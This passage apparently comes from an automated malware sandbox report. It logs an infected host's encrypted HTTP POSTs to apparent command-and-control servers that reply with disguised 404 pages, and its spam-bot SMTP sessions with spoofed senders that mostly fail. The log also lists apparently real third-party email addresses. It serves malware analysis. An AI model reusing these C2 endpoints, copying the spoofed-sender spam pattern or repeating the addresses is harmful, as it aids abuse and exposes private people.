User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 5.196.73.150:443
Content-Length: 356
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 4b 2d d6 f1 04 31 52 42 f6 ee 81 3b a0 93 ff c0 ba d0 b7 3c 16 98 bb 28 2e 56 8c 67 22 45 47 dc 71 b4 2e da 98 33 e6 91 4b e8 08 f8 1d c1 aa 28 88 6d 1b f3 9b 59 5f e0 09 e8 90 d2 f5 2a 71 c6 1d e1 5b ad ae 31 0b fc 32 14 ad 19 29 58 5e 41 15 10 de 2f 04 15 ca df 1e 94 c8 d5 07 13 7d e8 69 73 83 e6 d8 d9 7e 0a c7 f0 2c 3c e1 ec 45 ed 8a ca 40 35 87 f4 23 97 ec 81 63 80 4c 10 37 83 72 4e 1a 36 71 db 6e 3c 71 86 40 b1 f1 49 a1 8c b5 93 bb 67 67 f8 db de bb bc 21 04 62 47 99 3d 06 e0 03 01 c8 2c 38 9a f9 8a f7 a9 60 c8 65 cd 74 8e b9 07 1a 2b 07 4d 5b 0e 53 4f 4e 57 69 31 d9 86 71 3c 00 45 58 10 e1 24 fc b7 a5 32 69 ce c9 9b 6f a4 09 02 fd b2 6e c4 56 67 0a 0c 81 45 32 8f ab ae 79 dc 8f 37 0d 56 f9 00 bb 33 28 e5 23 57 cd a1 e3 5c c2 03 0b 36 33 0c a5 31 91 97 cc a6 fd 07 c7 f6 35 4a 07 fd 1c 8c 56 88 47 9d 5e 9f f7 76 92 aa 61 ab b3 df f0 fd 7f 61 6f a0 5a ce 55 63 9b 91 4f 0a 02 a1 16 f7 04 74 5c b7 b1 fd fd f3 0d 3a 35 fb b5 99 69 74 47 d9 89 01 9b 4a f2 dd ee 86 db d2 a7 30 48 0c 26 62 37 e8 8e 3d 5d 35 6e d2 7b 7a d9 5c 95 e4 1a e1 ab c3 bd 33 91 ca
Data Ascii: K-1RB;<(.Vg"EGq.3K(mY_*q[12)X^A/}is~,<E@5#cL7rN6qn<q@Igg!bG=,8`et+M[SONWi1q<EX$2ionVgE2y7V3(#W\6315JVG^vaaoZUcOt\:5itGJ0H&b7=]5n{z\3
1457
Okt 17, 2017 21:54:30.583451033 MESZ4434919493.180.157.92192.168.1.16HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 17 Oct 2017 19:54:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5156
Connection: keep-alive
Data Raw: f3 c4 c5 95 43 71 e0 7f 93 3e 07 d2 5e fa 2e 73 a7 8b 9e b7 5e 3f e8 91 d2 71 a9 84 77 95 57 f1 c9 c9 41 0b a0 ea 8c fa b0 18 11 dc ef 2f a7 9d e3 58 a2 9e ad 9c 22 f2 f5 b3 69 04 91 a2 3a 47 67 03 bb f1 9e 64 d9 28 b0 33 7a f9 87 d6 38 bb e4 b4 21 17 8c 01 96 12 02 ad f4 1b 4a c4 69 6d 44 5b ba 5f 9c 59 2a 74 09 d4 63 24 36 6c f0 5e b7 c9 59 df eb 4b b9 c9 42 df 27 5c 8d 87 f2 87 e6 f8 88 7b 20 f5 5a 46 de 26 be 38 e4 48 47 b2 c2 4c dd 1a 2a c9 6f 33 d4 d1 43 6f d2 6a a0 46 8d b2 be d8 37 89 ee 0f 9d df d4 64 e4 9f 62 30 58 27 d3 6a 23 bf a1 61 6a 0a 3f 4f bf 04 08 d0 61 79 43 cd d3 8a 58 8c c7 c3 09 ad 7a 21 51 1a 8a 76 a4 3c b6 f4 1e 90 36 fb 5d ae db d4 8c 6a 77 87 e5 3e 02 46 24 f6 53 ad 3c 8e 30 7a fb ec eb cb 0e a9 cb d2 ef 28 15 d8 29 de 76 7a fc 8a d7 a0 cb a3 91 a8 e9 71 f0 3e 00 b9 65 33 49 2b 1f f0 fb 11 43 87 e9 86 38 2a 68 c3 9c fb 0b 2a f6 84 fe 2b 2c 63 9b f6 1b 08 79 5e b8 52 61 c2 15 5d 05 d2 aa 59 62 77 43 4d a6 7e 34 d9 4d fc 98 5e 48 88 dc 91 86 45 63 dc 6f f4 24 5f 37 d7 ff e4 69 d0 ac c2 40 ad 30 1d f5 d2 ef f7 9a f7 85 1a c5 de 89 b7 43 df 4c 6a b8 f9 44 af 4c d0 b8 a8 3a 8d 83 1d 0e 04 11 73 0c c7 91 4b 7a 9d 5e 04 fa 61 ed 3e f2 b2 66 2b f6 b7 78 e4 c5 24 90 90 48 42 a8 2e db 59 b0 e0 17 53 1a 45 c5 61 cb 02 f9 df 21 d7 84 25 a8 81 b3 ef 22 9f 69 f1 ba ab 6c 7e 0f 55 c9 0e 89 77 70 f1 af 35 91 ec ff 65 be c4 91 d1 e6 97 33 e4 30 05 f5 a9 4b 30 c6 da 97 6b e5 ae 94 e8 cc a8 04 d8 70 4a 5c 58 74 ca fa 24 f6 9a 8c 62 1d d8 ec 10 a9 9d 49 f5 77 ea a1 9d e5 0f b6 2f f6 64 30 6f bb 91 99 fd c9 30 06 e6 ec bf 71 d3 31 96 c8 04 5c 9a 70 4c 25 61 b5 b0 1e 72 ec a4 c3 ec 43 b9 9d e6 b1 98 4c 22 fd f7 a8 f1 af cf d9 ee 92 20 00 0c cf 88 a1 0e 2b 76 f8 6e d0 b9 a6 26 d7 70 ac c7 ec b0 15 41 35 a3 7e 07 e9 17 71 9d 1c 83 5f 39 50 c9 12 25 89 93 ac 13 75 74 6f e6 f3 6a 3e 2e 8a f3 cd 57 89 08 18 e8 b9 dd 09 5e fc 52 2d 12 bd a0 75 71 b3 34 e6 ed bc c7 df 6c 82 75 60 9a 6f 39 b7 cd 19 99 4f 49 81 f4 d1 c6 2a 88 9b 13 41 2e 57 a2 a3 0e f2 15 07 1e fb 32 0e dd 89 74 1a cb a3 42 53 07 d8 ba 21 fc 0b 2f e5 8c 2a 50 f7 33 37 dd e2 c1 c0 8c 70 5c f1 96 1f 61 e4 b2 27 f7 d3 c3 d6 9d 11 77 82 39 36 81 b7 17 7f 96 8e 8e b2 f7 d3 7e 0f 11 13 f7 ba bd 95 fe 39 bf b1 ad 4f 08 5f fc bc ad 1d 56 56 56 d0 ae e4 aa 65 d6 1f ad 29 5a 9f eb f0 c1 5a 7c bd cd 8a 3f 19 d9 bd 26 74 0a ce 7c dd 8e f4 05 34 e0 0a 55 19 f3 fb 3a 8a b1 ec ef 9b 30 77 06 90 e8 40 1f 35 7e 82 90 3a 8a 9e 46 4b 60 ae a5 7c ce 5e e3 cf d1 a0 0e 45 9d ac 4a 9a ff df 37 eb dd 6f 36 ec 0b d4 9c 1b 51 d4 f1 be ed 78 fc 03 90 46 63 b3 bd 5e 31 c2 56 41 49 36 3c ce c4 a1 08 41 4e ad 39 00 2a cf 07 23 06 2f 0a b1 11 b6 48 ec 1a 0f 26 81 2e c7 06 22 74 59 27 69 7e e3 4e 40 f2 df eb 8a ef bc 8a 8f 29 f0 56 b4 28 1e 6c 13 cd f0 35 95 d2 a4 c4 a9 d4 53 ea 37 ca a6 0e c1 f8 a0 85 7f 75 f3 4d f3 4c 7a 26 c7 a0 f6 1c 92 1e e6 5e 0c 32 a4 b5 d8 e8 3e c0 88 f2 e9 51 92 5e fc cf 47 65 76 64 2b 2d 90 6d 2b 2e be a0 2f 3a 0f 98 27 7a 7b 06 d2 a6 27 7d e6 ab 0f 8a e5 e7 69 ed 25 23 b0 04 c5 ab 93 b2 c4 02 c7 47 86 2e b2 18 84 c9 fc 7e 81 de ed b0 9a 25 68 73 b3 57 e3 7b f2 30 9e d4 76 c2 96 9f db 0e 4e f6 1b 52 70 39 07 14 7c 07 03 61 15 89 06 53 36 2a a8 c0 55 eb 7e 5b bb f3 5b 4d db c6 56 1a 03 2d 4d 6b 87 d4 aa 82 86 97 21 b1 cc 60 9f 97 4b 41 d5 b4 52 6b cb 8c f6 d8 41 bf a8 db 18 21 f3 66 99 10 07 63 1a 2f 20 1d 7d de cd 49 2c b8 a2 6c 69 18 04 a2 e8 41 47 43 e9 70 5e 2f 26 b1 2e 36 ed b5 32 d3 34 c9 3d b7 3c 9f f7 3d 41 7e 97 eb 18 73 2b c7 61 02 16 55 2e 62 5d 29 da 65 80 83 75 09 74 e1 42 52 fd 48 3e e0 5e 18 d9 da 2d b6 9f b4 02 3e 43 31 52 36 e9 09 0f 91 af 5d 4c d8 a9 2e 48 a6 aa 4c 5c 31 91 d7 4f db 87 a7 5c df 84 54 8f 5c 64 e7 9c af 42 cf 2d da 12 74 49 2a fe cb 7e 9a 1c 0c 98 9a 78 e2 88 19 dd 5f 28 55 5b 1e 9b 5f 84 b4 04 de 66 d0 83 59 ed 11 ac c7 fe eb 6a 97 79 1f 37 8a 83 8d 15 ce 92 1c c9 3f 32 58 61 9f ad 1b 76 9b 7c ce a1 63 f2 5e a6 34 cd c5 40 50
Data Ascii: Cq>^.s^?qwWA/X"i:Ggd(3z8!JimD[_Y*tc$6l^YKB'\{ ZF&8HGL*o3CojF7db0X'j#aj?OayCXz!Qv<6]jw>F$S<0z()vzq>e3I+C8*h*+,cy^Ra]YbwCM~4M^HEco$_7i@0CLjDL:sKz^a>f+x$HB.YSEa!%"il~Uwp5e30K0kpJ\Xt$bIw/d0o0q1\pL%arCL" +vn&pA5~q_9P%utoj>.W^R-uq4lu`o9OI*A.W2tBS!/*P37p\a'w96~9O_VVVe)ZZ|?&t|4U:0w@5~:FK`|^EJ7o6QxFc^1VAI6<AN9*#/H&."tY'i~N@)V(l5S7uMLz&^2>Q^Gevd+-m+./:'z{'}i%#G.~%hsW{0vNRp9|aS6*U~[[MV-Mk!`KARkA!fc/ }I,liAGCp^/&.624=<=A~s+aU.b])eutBRH>^->C1R6]L.HL\1O\T\dB-tI*~x_(U[_fYjy7?2Xav|c^4@P
1459
Okt 17, 2017 21:54:30.656641006 MESZ443491955.196.73.150192.168.1.16HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 17 Oct 2017 19:54:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive
Data Raw: fa 33 ba dc 2e 66 1a 7e c2 a3 a6 33 ad 8b b0 df 09 55 13 fd c1 ee 18 ba 5c 10 2f 73 58 fe a8 2d 1e 94 47 f5 6c 44 bf 26 1f d2 12 3c e5 01 69 97 5b ff 6e 7c 65 f3 31 77 15 8e be e7 e3 e3 6f 95 57 cc 91 d0 9f f8 50 c9 4c 2b bf d6 e3 01 65 21 a8 b0 ab 13 c3 a7 d0 47 75 81 b5 4b 8e 8d 5a 53 50 21 63 17 4a 90 69 e5 f2 82 77 c5 9d a7 fb 14 1e e8 2f 8e dc 01 bd 1a 21 e3 29 22 b6 45 9b c3 5f 05 d9 5d e3 5e b4 ed ae cd 30 ce fb b2 02 bd 0f 51 e6 50
Data Ascii: 3.f~3U\/sX-GlD&<i[n|e1woWPL+e!GuKZSP!cJiw/!)"E_]^0QP
1464
Okt 17, 2017 21:55:40.627486944 MESZ49266443192.168.1.1693.180.157.92POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 93.180.157.92:443
Content-Length: 612
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 76 63 1d fb 03 17 f9 68 e3 c3 ed 9a de da 6c c8 6b b3 12 0d d5 15 e3 c0 9e a0 db a2 59 13 10 41 32 ca b3 ee e9 4b 47 41 3f e4 fa a7 aa f1 87 bf ae e7 d7 fc b2 e6 4d d6 c3 e5 84 d9 ce 77 91 0f 59 de b4 63 1a 2c d6 9d f5 55 4e e3 45 80 8c 0a ba 4e 97 7c 8d fa 6a 4a 14 49 a7 a8 5f e9 9b e3 03 31 77 75 8b 30 f0 a1 96 1c f0 6c 4a 58 2a c9 19 9e 0a 3a 6e 70 c0 bb 24 5c c0 9c 21 da c1 1a 79 ad ec 83 5f b3 e6 8c 1e 26 93 8a 3e 60 40 c2 e8 76 1e 07 83 45 36 94 3e 54 fc 0e bf 80 eb 94 d4 2d 27 1c 3b 4d e6 a7 9c 7f c1 41 ae 32 36 eb 8d b1 1d ed 9d 86 cc 91 fa 8e 5d 7a 19 35 eb 3e f4 12 b6 f9 44 70 cd 31 95 b6 f5 c3 7a 29 fc 52 ba 68 54 af d0 a2 f8 67 1a 68 30 99 79 3d 8f e6 5d 75 89 fe 49 5c 1a ec 80 a6 d2 cf b5 61 be 98 fa 8c 2c cd a1 a2 7e 58 0f 61 bb 6b f4 64 9c b9 85 1a aa 29 de 9a 41 b8 51 63 f8 b8 17 ea 68 04 99 bb a2 ac aa fb d6 1f 63 69 f4 ad 67 e1 63 79 dc e5 9a 51 e9 f1 88 ab f1 b7 0c 22 19 ca 13 7b 04 c2 63 8c c9 cf 38 7b 8b b6 f6 19 f0 54 d5 a9 02 c6 0b 83 4c 25 70 aa 45 fa c3 e4 85 3e 22 8e a5 21 4d b6 79 80 40 b7 1e d2 d4 47 03 7e ea 90 b3 13 21 44 67 2f 3d 3f 0b fd f6 8b 14 4b 10 fc 55 13 90 7a 93 2a 68 11 91 c7 53 c8 54 ce 5d 27 e1 c9 25 81 d9 b2 28 e7 c2 26 4a 43 7c f6 c9 79 57 ce 64 9a 4a eb ce 0f 0c f2 93 43 33 82 ef e0 b9 aa 49 33 de 04 05 a4 eb 38 b5 45 b6 7f 06 eb de 4f 41 c2 31 a1 33 67 82 8c 05 0f 5a 7a 14 95 df 81 6a 7a 24 56 01 01 66 de 7b de 75 80 cd bd df dc 1f 3b 7a 87 3b 59 fc 20 2f c6 83 bb 39 2c 7e 7c 0c 66 54 0d de 68 e9 9d 5b 6a d3 eb 5a d5 61 04 dc a9 f5 6a a7 64 1b c2 f7 1e 99 05 83 d4 f7 84 b4 ec b1 ba 01 a5 f3 04 40 a0 60 30 33 10 fc 34 68 95 28 d2 ef 68 cf 36 4d c7 44 e6 6c ea 40 60 7d 29 d2 b9 c2 f8 83 43 d9 57 fa c6 cc ba f3 52 2b 56 33 d5 3e 4a 7d 27 17 04 8a 80 ac c3 5f a1 a0 3e 50 03 81 44 52 f6 55 f2 e0 d8 1f 88 65 d2 10 61 f6 43 27 d6 70 91 cc 87 e6 66 eb 61 ca dc d5 19
Data Ascii: vchlkYA2KGA?MwYc,UNEN|jJI_1wu0lJX*:np$\!y_&>`@vE6>T-';MA26]z5>Dp1z)RhTgh0y=]uI\a,~Xakd)AQchcigcyQ"{c8{TL%pE>"!My@G~!Dg/=?KUz*hST]'%(&JC|yWdJC3I38EOA13gZzjz$Vf{u;z;Y /9,~|fTh[jZajd@`034h(h6MDl@`})CWR+V3>J}'_>PDRUeaC'pfa
1897
Okt 17, 2017 21:55:41.273890018 MESZ4434926693.180.157.92192.168.1.16HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 17 Oct 2017 19:55:41 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
1897

SMTP Packets

TimestampSource PortDest PortSource IPDest IPCommands
Okt 17, 2017 21:54:31.514163017 MESZ5874920440.101.48.82192.168.1.16220 HE1PR0202CA0004.outlook.office365.com Microsoft ESMTP MAIL Service ready at Tue, 17 Oct 2017 19:54:30 +0000
Okt 17, 2017 21:54:31.514194965 MESZ5874920540.101.48.82192.168.1.16220 HE1PR0202CA0003.outlook.office365.com Microsoft ESMTP MAIL Service ready at Tue, 17 Oct 2017 19:54:30 +0000
Okt 17, 2017 21:54:31.519229889 MESZ49204587192.168.1.1640.101.48.82EHLO 10.0.0.4
Okt 17, 2017 21:54:31.524420023 MESZ49205587192.168.1.1640.101.48.82EHLO 10.0.0.5
Okt 17, 2017 21:54:31.529042959 MESZ5874920640.101.48.82192.168.1.16220 HE1PR0202CA0014.outlook.office365.com Microsoft ESMTP MAIL Service ready at Tue, 17 Oct 2017 19:54:30 +0000
Okt 17, 2017 21:54:31.532640934 MESZ49206587192.168.1.1640.101.48.82EHLO 10.0.0.5
Okt 17, 2017 21:54:31.536207914 MESZ5874920740.101.48.82192.168.1.16220 HE1PR0202CA0024.outlook.office365.com Microsoft ESMTP MAIL Service ready at Tue, 17 Oct 2017 19:54:30 +0000
Okt 17, 2017 21:54:31.536237955 MESZ5874920840.101.48.82192.168.1.16220 HE1PR0202CA0002.outlook.office365.com Microsoft ESMTP MAIL Service ready at Tue, 17 Oct 2017 19:54:30 +0000
Okt 17, 2017 21:54:31.539952993 MESZ49207587192.168.1.1640.101.48.82EHLO 10.0.0.
Okt 17, 2017 21:54:31.543598890 MESZ49208587192.168.1.1640.101.48.82EHLO 10.0.0.
Okt 17, 2017 21:54:31.579010010 MESZ5874920940.101.48.82192.168.1.16220 HE1PR0202CA0013.outlook.office365.com Microsoft ESMTP MAIL Service ready at Tue, 17 Oct 2017 19:54:30 +0000
Okt 17, 2017 21:54:31.586153030 MESZ5874921040.101.48.82192.168.1.16220 HE1PR0202CA0001.outlook.office365.com Microsoft ESMTP MAIL Service ready at Tue, 17 Oct 2017 19:54:31 +0000
Okt 17, 2017 21:54:31.606100082 MESZ49209587192.168.1.1640.101.48.82EHLO 10.0.0.
Okt 17, 2017 21:54:31.615247011 MESZ49210587192.168.1.1640.101.48.82EHLO 10.0.0.
Okt 17, 2017 21:54:31.689789057 MESZ5874920540.101.48.82192.168.1.16250-HE1PR0202CA0003.outlook.office365.com Hello [95.141.35.15]
250-SIZE 157286400
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-STARTTLS
250-8BITMIME
250-BINARYMIME
250-CHUNKING
250 SMTPUTF8
Okt 17, 2017 21:54:31.764830112 MESZ5874920940.101.48.82192.168.1.16250-HE1PR0202CA0013.outlook.office365.com Hello [95.141.35.15]
250-SIZE 157286400
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-STARTTLS
250-8BITMIME
250-BINARYMIME
250-CHUNKING
250 SMTPUTF8
Okt 17, 2017 21:54:31.785228014 MESZ5874920440.101.48.82192.168.1.16250-HE1PR0202CA0004.outlook.office365.com Hello [95.141.35.15]
250-SIZE 157286400
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-STARTTLS
250-8BITMIME
250-BINARYMIME
250-CHUNKING
250 SMTPUTF8
Okt 17, 2017 21:54:31.792258978 MESZ5874920640.101.48.82192.168.1.16250-HE1PR0202CA0014.outlook.office365.com Hello [95.141.35.15]
250-SIZE 157286400
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-STARTTLS
250-8BITMIME
250-BINARYMIME
250-CHUNKING
250 SMTPUTF8
Okt 17, 2017 21:54:31.862306118 MESZ5874920740.101.48.82192.168.1.16250-HE1PR0202CA0024.outlook.office365.com Hello [95.141.35.15]
250-SIZE 157286400
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-STARTTLS
250-8BITMIME
250-BINARYMIME
250-CHUNKING
250 SMTPUTF8
Okt 17, 2017 21:54:31.881165981 MESZ5874920840.101.48.82192.168.1.16250-HE1PR0202CA0002.outlook.office365.com Hello [95.141.35.15]
250-SIZE 157286400
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-STARTTLS
250-8BITMIME
250-BINARYMIME
250-CHUNKING
250 SMTPUTF8
Okt 17, 2017 21:54:31.888338089 MESZ5874921040.101.48.82192.168.1.16250-HE1PR0202CA0001.outlook.office365.com Hello [95.141.35.15]
250-SIZE 157286400
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-STARTTLS
250-8BITMIME
250-BINARYMIME
250-CHUNKING
250 SMTPUTF8
Okt 17, 2017 21:54:31.955804110 MESZ5874920440.101.48.82192.168.1.16220 2.0.0 SMTP server ready
Okt 17, 2017 21:54:31.991044998 MESZ5874920640.101.48.82192.168.1.16220 2.0.0 SMTP server ready
Okt 17, 2017 21:54:32.027206898 MESZ5874920540.101.48.82192.168.1.16220 2.0.0 SMTP server ready
Okt 17, 2017 21:54:32.070822001 MESZ5874920940.101.48.82192.168.1.16220 2.0.0 SMTP server ready
Okt 17, 2017 21:54:32.141844034 MESZ5874921040.101.48.82192.168.1.16220 2.0.0 SMTP server ready
Okt 17, 2017 21:54:32.156481981 MESZ5874920440.101.48.82192.168.1.16220 2.0.0 SMTP server ready
Okt 17, 2017 21:54:32.161500931 MESZ5874920740.101.48.82192.168.1.16220 2.0.0 SMTP server ready
Okt 17, 2017 21:54:32.192492008 MESZ5874920640.101.48.82192.168.1.16220 2.0.0 SMTP server ready
Okt 17, 2017 21:54:32.202982903 MESZ5874920840.101.48.82192.168.1.16220 2.0.0 SMTP server ready
Okt 17, 2017 21:54:33.367542982 MESZ58749214213.186.33.20192.168.1.16220-ssl0.ovh.net player714
Okt 17, 2017 21:54:33.394232035 MESZ58749213212.77.101.1192.168.1.16220 smtp.wp.pl ESMTP
Okt 17, 2017 21:54:33.394844055 MESZ49213587192.168.1.16212.77.101.1HELO 10.0.0.6
Okt 17, 2017 21:54:33.568476915 MESZ58749214213.186.33.20192.168.1.16220-ssl0.ovh.net player714
Okt 17, 2017 21:54:33.653670073 MESZ58749217212.77.101.1192.168.1.16220 smtp.wp.pl ESMTP
Okt 17, 2017 21:54:33.658139944 MESZ49217587192.168.1.16212.77.101.1HELO 10.0.0.
Okt 17, 2017 21:54:33.670172930 MESZ58749215195.78.67.24192.168.1.16220 k20.active24.pl ESMTP
Okt 17, 2017 21:54:33.670914888 MESZ49215587192.168.1.16195.78.67.24HELO 10.0.0.2
Okt 17, 2017 21:54:33.695214033 MESZ58749213212.77.101.1192.168.1.16250 smtp.wp.pl
Okt 17, 2017 21:54:33.696039915 MESZ49213587192.168.1.16212.77.101.1MAIL FROM: <karolina.kundys@wp.pl
Okt 17, 2017 21:54:33.884926081 MESZ58749215195.78.67.24192.168.1.16250 k20.active24.pl
Okt 17, 2017 21:54:33.886898041 MESZ49215587192.168.1.16195.78.67.24MAIL FROM: <a.kuberska@ate-zbaszyn.eu
Okt 17, 2017 21:54:33.917815924 MESZ58749213212.77.101.1192.168.1.16550 BLAD SPF - zobacz strone / SPF Error: Please see http://www.openspf.org/Why?id=karolina.kundys%40wp.pl&ip=95.141.35.15&receiver=smtp.wp.pl Jesli jestes uzytkownikiem poczta.wp.pl sprawdz poprawnosc autoryzacji SMTP / If you are a poczta.wp.pl user check SMTP configuration: http://poczta.wp.pl/autoryzacja/
Okt 17, 2017 21:54:33.936779976 MESZ58749217212.77.101.1192.168.1.16250 smtp.wp.pl
Okt 17, 2017 21:54:33.937364101 MESZ49217587192.168.1.16212.77.101.1MAIL FROM: <dckd@wp.pl
Okt 17, 2017 21:54:34.087680101 MESZ58749218212.77.101.1192.168.1.16220 smtp.wp.pl ESMTP
Okt 17, 2017 21:54:34.088936090 MESZ49218587192.168.1.16212.77.101.1HELO 10.0.0.5
Okt 17, 2017 21:54:34.131716967 MESZ58749215195.78.67.24192.168.1.16250 2.1.0 Ok
Okt 17, 2017 21:54:34.132241011 MESZ49215587192.168.1.16195.78.67.24RCPT TO: <brian_m_wilson@hma.honda.com
Okt 17, 2017 21:54:34.182118893 MESZ58749217212.77.101.1192.168.1.16550 BLAD SPF - zobacz strone / SPF Error: Please see http://www.openspf.org/Why?id=dckd%40wp.pl&ip=95.141.35.15&receiver=smtp.wp.pl Jesli jestes uzytkownikiem poczta.wp.pl sprawdz poprawnosc autoryzacji SMTP / If you are a poczta.wp.pl user check SMTP configuration: http://poczta.wp.pl/autoryzacja/
Okt 17, 2017 21:54:34.315757036 MESZ58749218212.77.101.1192.168.1.16250 smtp.wp.pl
Okt 17, 2017 21:54:34.316756010 MESZ49218587192.168.1.16212.77.101.1MAIL FROM: <SanderWP@wp.pl
Okt 17, 2017 21:54:34.542144060 MESZ58749218212.77.101.1192.168.1.16550 BLAD SPF - zobacz strone / SPF Error: Please see http://www.openspf.org/Why?id=SanderWP%40wp.pl&ip=95.141.35.15&receiver=smtp.wp.pl Jesli jestes uzytkownikiem poczta.wp.pl sprawdz poprawnosc autoryzacji SMTP / If you are a poczta.wp.pl user check SMTP configuration: http://poczta.wp.pl/autoryzacja/
Okt 17, 2017 21:54:34.587735891 MESZ58749215195.78.67.24192.168.1.16550 5.7.1 <unknown[95.141.35.15]:45129>: Client host rejected: Wymagana autoryzacja/Authorization required. Aby uzyskac pomoc napisz na adres bok@active24.pl lub odwiedz strone www.active24.pl/kontakt , For assistance please mail bok@active24.pl or visit www.active24.pl/kontakt
Okt 17, 2017 21:54:34.624663115 MESZ58749219195.4.92.211192.168.1.16220 mx3.freenet.de ESMTP Exim 4.89 Tue, 17 Oct 2017 21:54:34 +0200
Okt 17, 2017 21:54:34.626480103 MESZ49219587192.168.1.16195.4.92.211EHLO 10.0.0.1
Okt 17, 2017 21:54:36.686714888 MESZ5874922785.13.152.217192.168.1.16220 dd35930.kasserver.com ESMTP
Okt 17, 2017 21:54:36.688452959 MESZ49227587192.168.1.1685.13.152.217HELO 10.0.0.2
Okt 17, 2017 21:54:36.793277025 MESZ5874923091.198.169.21192.168.1.16220 smtpfilter3.public.one.com ESMTP
Okt 17, 2017 21:54:36.795150042 MESZ49230587192.168.1.1691.198.169.21HELO 10.0.0.1
Okt 17, 2017 21:54:36.867649078 MESZ58749219195.4.92.211192.168.1.16550 Administrative prohibition
Okt 17, 2017 21:54:36.876199961 MESZ5874922785.13.152.217192.168.1.16250 dd35930.kasserver.com
Okt 17, 2017 21:54:36.876939058 MESZ49227587192.168.1.1685.13.152.217MAIL FROM: <robert@zobelei.de
Okt 17, 2017 21:54:37.115751982 MESZ5874923091.198.169.21192.168.1.16250 smtpfilter3.public.one.com
Okt 17, 2017 21:54:37.116765976 MESZ49230587192.168.1.1691.198.169.21MAIL FROM: <verner@voestergaard.dk
Okt 17, 2017 21:54:37.124115944 MESZ5874922785.13.152.217192.168.1.16250 2.1.0 Ok
Okt 17, 2017 21:54:37.124556065 MESZ49227587192.168.1.1685.13.152.217RCPT TO: <brian_m@telus.net
Okt 17, 2017 21:54:37.331927061 MESZ5874923091.198.169.21192.168.1.16250 2.1.0 Ok
Okt 17, 2017 21:54:37.331970930 MESZ5874922785.13.152.217192.168.1.16454 4.7.1 <brian_m@telus.net>: Relay access denied
Okt 17, 2017 21:54:37.332870007 MESZ49230587192.168.1.1691.198.169.21RCPT TO: <brian_m@starlite.com
Okt 17, 2017 21:54:37.512166977 MESZ5874923091.198.169.21192.168.1.16554 5.7.1 Recipient address rejected: Authentication required
Okt 17, 2017 21:54:37.963964939 MESZ58749233213.186.33.155192.168.1.16220-ssl0.ovh.net player755
